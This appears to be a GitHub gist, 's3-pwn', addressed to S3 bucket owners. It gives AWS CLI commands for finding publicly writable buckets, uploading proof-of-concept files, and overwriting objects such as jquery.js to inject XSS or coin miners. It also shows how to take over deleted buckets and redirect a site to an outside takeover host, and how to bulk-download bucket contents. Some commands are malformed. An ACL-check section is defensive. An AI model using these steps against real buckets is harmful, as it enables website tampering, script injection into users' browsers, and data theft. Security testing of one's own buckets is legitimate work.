Skip to content

Instantly share code, notes, and snippets.

@random-robbie

random-robbie/s3-pwn.md

Last active October 4, 2021 01:10
Show Gist options
  • Star 3 You must be signed in to star a gist
  • Fork 1 You must be signed in to fork a gist
  • Save random-robbie/43eb7900c9da8519ef31b9de260e500e to your computer and use it in GitHub Desktop.
Save random-robbie/43eb7900c9da8519ef31b9de260e500e to your computer and use it in GitHub Desktop.
Download ZIP
Raw
s3-pwn.md

If you are reading this then there is a chance you have a poc.txt in your s3 bucket.

This is just a little heads up to say attackers can upload and overwrite files in your s3 bucket and if you are serving up files like JS they can add an XSS or coinhive to your js.

If you login to your AWS console find the bucket please remove the public-write permission from the bucket and this will fix the issue.

How to test a s3 bucket for bad permissions

You will need the AWS cli installed and configured!

aws s3api get-bucket-acl --bucket bucketname

if you see the following then you have problems!

{
            "Permission": "FULL_CONTROL",
            "Grantee": {
                "URI": "http://acs.amazonaws.com/groups/global/AllUsers",
                "Type": "Group"
}

Login in to your AWS console and remove the public-write permission ASAP.

How to upload a poc to a bucket

aws s3 poc.txt s3://bucketname --region us-east-2 --acl public-read

Change the region of the bucket if it's not in us-east-2.

If you see an error then the bucket does not allow public uploads.

Bad Object Permissions Hi-jack

On the rare occasion you can test files for ALLUsers control. This means the bucket is not writeable but the file is!

You can find this out by doing

aws s3api get-object-acl --bucket bucketname --key jquery.js

if you see ALLUsers FULL_CONTROL then you can overwrite this file!!

to do this you need to do the following command

aws s3api put-object-acl --bucket bucketname --key jquery.js --grant-full-control emailaddress=YOURAWSEMAILADDRESS --grant-write uri=http://acs.amazonaws.com/groups/global/AuthenticatedUsers

now all you do is download the file alter it and reupload it

aws s3 jquery.js s3://bucketname --region us-east-2 --acl public-read

Subdomain takeover / Redirect

Sometimes when you visit a website you might see NoSuchBucket which means the s3 bucket that had the files on for that site is no longer around and has been deleted you can easily hijack this by creating the bucket.

Create the Bucket

aws s3api create-bucket --bucket bucketname --acl public-read --region us-east-1

redirect.json

{
    "RedirectAllRequestsTo": {
        "HostName": "takeover.xsses.rocks"
    }
}

Change the hostname to youre take over page.

aws s3api put-bucket-website --bucket bucketname --website-configuration file://redirect.json

The website will now redirect to your webpage.

Download a file from a s3 bucket

Change the mybucket and the file to what ever you want and this will download the file to your /tmp/ folder/

aws s3 cp  s3://mybucket/one-central/js/qa.js /tmp/

Download everything in a bucket

This will clone everything you have permission to view on to your machine.

aws sync s3://mybucket --recursive
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment